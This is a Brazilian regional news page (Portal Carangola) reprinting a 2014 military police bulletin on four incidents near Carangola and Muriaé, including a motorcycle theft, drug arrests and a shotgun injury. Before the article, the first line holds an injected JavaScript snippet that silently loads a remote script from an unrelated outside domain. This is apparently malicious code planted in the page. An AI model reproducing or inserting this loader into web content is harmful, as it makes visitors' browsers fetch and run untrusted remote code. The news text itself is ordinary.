;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região-30/07/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região-30/07/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 30/07/2014

                        75ª CIA PM- CARANGOLA-MG

PM LOCALIZA VEÍCULO FURTADO EM DIVINO

 Em 29/07/2014, por volta das 15h50min, no Córrego São Domingos, zona rural de Divino, militares avistaram a motocicleta HONDA CG TITAN 150, vermelha, caída próximo à estrada vicinal. Em consulta ao sistema SIDS/ISP, foi constatado que tal motocicleta foi furtada na noite anterior. A motocicleta foi removida para o pátio credenciado DETRAN.

                        76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO POR ENVOLVIMENTO COM DROGAS E DESOBEDIÊNCIA EM MURIAÉ

 Em 29/07/2014, por volta das 08h20min, na Rua Armando Luciano Durvanel, no Bairro Franco Suíço, após denúncias, de que V.M.V. de 22 anos, conhecido pela venda de drogas ilícitas, estava trafegando em uma bicicleta transportando arma de fogo e drogas, militares depararam com o denunciado trazendo uma sacola com o possível entorpecente, e um volume não identificado dentro da blusa. Dado ordem de parada ao suspeito, este evadiu e em seguida pulou nas águas do rio MURIAÉ, saindo em um matagal do outro lado da margem, onde foi abordado pela guarnição que fazia o cerco. Não foi encontrado nenhuma irregularidade com o indivíduo, porém no trajeto de fuga do autor, foi localizado um aparelho celular e uma bucha de maconha. Do exposto, foi dado voz de prisão em flagrante ao mesmo, o qual, após ser atendido no HSP, foi encaminhado à DPJ.

PM REGISTRA LESÃO CORPORAL POR DISPARO DE ARMA DE FOGO NA ZONA RURAL DE MIRADOURO

 Em 29/07/2014, por volta das 15h, próximo à Fazenda Paraíso, zona rural de Miradouro, militares deslocaram ao HOSPITAL em MIRADOURO, e em contato com a vítima W.R.F. de 19 anos, este relatou que estava na condução de sua motocicleta XRE 300 e, ao passar por um certo trecho da estrada vicinal, sentido a FERVEDOURO onde reside, foi alvejado por disparos de arma de fogo, porém não sabe dizer de onde e nem quem efetuou os disparos. Após ser atingido, continuou o seu trajeto até a BR-116, quando deparou com uma ambulância, que o socorreu. Militares deslocaram ao local dos fatos e depararam com o lugar onde o atirador supostamente se posicionou para efetuar os disparos, onde foi encontrado duas partes dos cartuchos deflagrados, 01 pé de meia e 03 cartuchos deflagrados, todos de calibre 12. A motocicleta foi encaminhada à DPJ de MIRADOURO. A vítima foi encaminhada, posteriormente, ao HSP em MURIAÉ onde deu entrada com várias perfurações de projeteis de chumbo, só no rosto foram retirados pelo menos cinco projéteis, porém não corre risco de morte.

PM CUMPRE MANDADO DE PRISÃO A FORAGIDO EM MURIAÉ

Em 29/07/2014, por volta das 21h40min, na Rua Palmeiras, no Bairro Napoleão, após informações, militares localizaram A.F.A. de 28 anos, e dado voz de parada ao indivíduo, este ignorou a ordem e saiu em desabalada carreira tomando rumo aos fundos de algumas residências no bairro NAPOLEÃO. O mesmo posteriormente foi localizado no meio do mato, nos fundos de uma residência. Este relatou ter corrido por estar de posse de um cachimbo artesanal feito para fumar crack, o qual foi apreendido. Após consulta ao sistema foi constatado haver contra o indivíduo mandado de prisão oriundo da cidade de SOROCABA-SP. Diante o exposto foi dado voz de prisão ao autor e conduzido à DPJ.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.